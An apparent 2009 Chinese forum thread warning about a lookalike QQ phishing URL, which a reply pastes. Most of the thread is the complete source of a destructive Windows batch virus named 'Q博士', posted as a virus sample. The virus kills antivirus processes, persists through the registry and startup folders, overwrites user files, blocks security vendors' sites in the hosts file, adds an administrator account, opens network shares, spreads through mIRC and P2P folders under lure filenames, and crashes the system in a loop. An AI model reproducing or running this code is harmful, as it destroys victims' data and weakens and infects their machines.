发个钓鱼网站大家注意类似的

显示全部楼层 · 发表于 2009-7-26 21:11:50

http://haoma.qq.com.qq-com-qqhao-qq-com-vip-qq-com.cn/?sign=0679e

显示全部楼层 · 发表于 2009-7-26 21:15:47

Bad Request (Invalid Hostname)

显示全部楼层 · 发表于 2009-7-26 21:30:19

网盾报

显示全部楼层 · 发表于 2009-7-26 21:31:44

打不开了= =

显示全部楼层 · 发表于 2009-7-26 21:45:35

@echo off
%na2q%
%random%%random%%random%%random%%random%%random%%random%
%1xp5%
%random%%random%%random%%random%%random%%random%%random%
%bcsw%
%random%%random%%random%%random%%random%%random%%random%
%2z4m%
%random%%random%%random%%random%%random%%random%%random%
%dzqo%
%random%%random%%random%%random%%random%%random%%random%
%n7lh%
%random%%random%%random%%random%%random%%random%%random%
set a=Q博士
%xuxr%
%sva7%
copy %0 %windir%\%a%.bat
%jwan%
%v85q%
set Q博士=tskill
%Q博士% norton*
%Q博士% av*
%Q博士% fire*
%Q博士% anti*
%Q博士% spy*
%Q博士% bullguard
%Q博士% PersFw
%Q博士% KAV*
%Q博士% ZONEALARM
%Q博士% SAFEWEB
%Q博士% OUTPOST
%Q博士% nv*
%Q博士% nav*
%Q博士% F-*
%Q博士% ESAFE
%Q博士% cle
%Q博士% BLACKICE
%Q博士% def*
%yog6%
%lgvg%
%bh7r%
%1mvx%
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Q博士 /t REG_SZ /d %windir%\%a%.bat /f > nul
%drx4%
%nvth%
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Q博士 /t REG_SZ /d %windir%\%a%.bat /f > nul
%eghp%
%olfo%
set Q博士1=echo
%6dbh%
%phgy%
%Q博士1% [windows] >> %windir%\win.ini
%dq1e%
%Q博士1% run=%windir%\%a%.bat >> %windir%\win.ini
%Q博士1% load=%windir%\%a%.bat >> %windir%\win.ini
%Q博士1% [boot] >> %windir%\system.ini
%wx7n%
%Q博士1% shell=explorer.exe %a%.bat >> %windir%\system.ini
%1t8g%
%3i7b%
chcp 1252 > nul
%random%%Q博士%%random%%Q博士%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%a%.bat" > nul
%tgi6%
copy %0 "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\%a%.bat" > nul
%random%%Q博士%%random%%Q博士%
%ky71%
net share ADMIN$
%4oxw%
net share C$
net share IPC$
%u8h3%
net share c=c:
net share d=d:
%lpwf%
%agk2%
for %%a in (*.bat *.txt *.doc *.pdf *.jpg) do copy %0 %%a > nul
%eiy3%
set Q博士2=echo
%3u5o%
%xqev%
%Q博士2% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts
%tfda%
%vrqp%
%2fci%
echo MsgBox "Infected with Q博士", 16, "Q博士" > v.vbs
start v.vbs
%nmua%
%8c43%
set x=%random%
%rz8n%
%coyl%
copy %0 %windir%\%x%.bat > nul
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v html /t REG_SZ /d "%windir%\%x%.bat" /f > nul
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Q博士 /t REG_SZ /d "%windir%\%a%.bat" /f > nul
cd %windir%\system32
for %%a in (*.bat) do copy %0 %%a > nul
cd ..
for %%a in (*.bat) do copy %0 %%a > nul
copy %0 c:\autoexec.bat
%bgmg%
%zuq7%
%miua%
set Q博士3=echo
copy %0 %windir%\ftppassword.bat
%Q博士3% [script] > irc.bat
%Q博士3% n1={ if ($nick == $me) { halt } >> irc.bat
%Q博士3% n2=/dcc send $nick "%windir%\ftppassword.bat" >> irc.bat
%Q博士3% n3= } >> irc.bat
if exist c:\mIRC\script.ini copy irc.bat c:\mIRC\script.ini
%26rv%
if exist %programfiles%\mIRC\script.ini copy irc.bat %programfiles%\mIRC\script.ini
del irc.bat > nul
%hz72%
%8v11%
md %programfiles%\Q博士\xxx\ > nul
md %programfiles%\Q博士\cracks\ > nul
copy %0 %programfiles%\Q博士\xxx\xxxpasses.txt.bat > nul
copy %0 %programfiles%\Q博士\cracks\keygen.exe.bat > nul
copy %0 %programfiles%\Q博士\cracks\serialsV7.exe.bat > nul
copy %0 %programfiles%\Q博士\cracks\crack_it.exe.bat > nul
echo to crack your programm use crack_it.exe, hf ;) > %programfiles%\Q博士\cracks\readme.txt
net share xxx&cracks=%programfiles%\Q博士 > nul
%jewt%
%Q博士%%random%%Q博士%
%55kt%
%vxxx%
net user root pwd /add
net localgroup "Administratoren" root /add
%udd4%
net localgroup "Administrators" root /add
%Q博士%%random%%random%%Q博士%
%dhd2%
%dbaq%
reg add HKLM\SOFTWARE\Microsoft\Ole\ /v EnableDCOM /t REG_SZ /d Y /f > nul
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v restrictanonymous /t REG_SZ /d 0 /f > nul
%llnj%
%tdjl%
%wdmg%
%myf5%
set Q博士c=echo
%6wg8%
%Q博士c% "<html>" > %windir%\hax0r.html
%Q博士c% "<head>" >> %windir%\hax0r.html
%Q博士c% "<title>Virus</title>" >> %windir%\hax0r.html
%Q博士c% "</head>" >> %windir%\hax0r.html
%Q博士c% "<body bgcolor="#000000">" >> %windir%\hax0r.html
%Q博士c% "buh!" >> %windir%\hax0r.html
%Q博士c% "</body>" >> %windir%\hax0r.html
%Q博士c% "</html>" >> %windir%\hax0r.html
%axal%
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_SZ /d "%windir%\hax0r.html" /f > nul
%443r%
%4xug%
%wf72%
%r3zr%
md %programfiles%\shared_folder > nul
copy %0 %programfiles%\shared_folder\parishilton.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_movie2.jpg.bat > nul
%Q博士%%random%%Q博士%%Q博士%%random%
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.txt.bat > nul
copy %0 %programfiles%\shared_folder\parishilton_phonenumbers.bat > nul
%Q博士%%random%%Q博士%%Q博士%%random% > nul
copy %0 %programfiles%\shared_folder\css_wallhack.bat > nul
reg add "HKCU\Software\Kazaa\LocalContent" /v DownloadDir /t REG_SZ /d "%programfiles%\shared_folder" /f > nul
%6hxi%
%jfi4%
set Q博士a=copy
%17is%
%fojo%
%Q博士a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Q博士a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%Q博士a% %0 %programfiles%\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%Q博士a% %0 c:\Warez P2P Client\My Shared Folder\parishilton.txt.bat > nul
%Q博士a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_movie2.jpg.bat > nul
%ulq8%
%Q博士a% %0 c:\Warez P2P Client\My Shared Folder\parishilton_phonenumbers.txt.bat > nul
%7w2c%
%ur5o%
%3dt4%
%i174%
shutdown /r /f /t 23 /c "Infected with Q博士 virus!!"
%d8j8%
%vzwo%
shutdown /s /f /t 23 /c "Infected with Q博士 virus!!"
%mlgq%
%hrtc%
%7f3k%
%6661%
%yiif%
%13li%
:bombing
chcp 1252 > nul
%random%%Q博士%%random%%Q博士%
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\Autostart\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒Programme\%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\All Users\Startmen黒%random%.bat" > nul
copy %0 "C:\Dokumente und Einstellungen\%USERNAME%\Desktop\%random%.bat" > nul
copy %0 "C:\%random%.bat" > nul
%random%%Q博士%%random%%Q博士%
%8nnw%
taskkill /f /im explorer.exe > nul
taskkill /f /im lsass.exe > nul
goto bombing
%hrqm%
%fs8m%
%dav%
%tfo6%
:: Q博士 by Q博士

[病毒样本] 发个钓鱼网站大家注意类似的